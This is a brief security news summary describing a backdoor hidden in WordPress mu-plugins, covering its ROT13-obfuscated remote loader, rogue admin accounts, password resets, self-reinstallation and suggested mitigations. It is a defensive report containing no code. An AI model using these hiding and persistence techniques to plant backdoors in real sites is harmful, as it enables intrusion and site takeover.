Cybersecurity researchers have identified a new stealthy backdoor hidden within WordPress mu-plugins, allowing threat actors persistent access and remote control. This malware manipulates plugin files, creates malicious admin accounts, and can execute arbitrary PHP code, posing significant risks to affected sites. #WordPress #mu-plugins
Keypoints
- The backdoor is concealed in the โwp-content/mu-pluginsโ directory, avoiding detection in normal plugin lists.
- The PHP script โwp-index.phpโ acts as a loader to fetch and execute a remote payload using obfuscated ROT13 encoding.
- Threat actors can inject files, create admin users, and activate malicious plugins like โwp-bot-protect.phpโ.
- The malware can reset administrator passwords and reinstate itself after removal, maintaining persistence.
- Mitigation strategies include updating WordPress components, enabling two-factor authentication, and conducting regular security audits.
Read More: https://thehackernews.com/2025/07/hackers-deploy-stealth-backdoor-in.html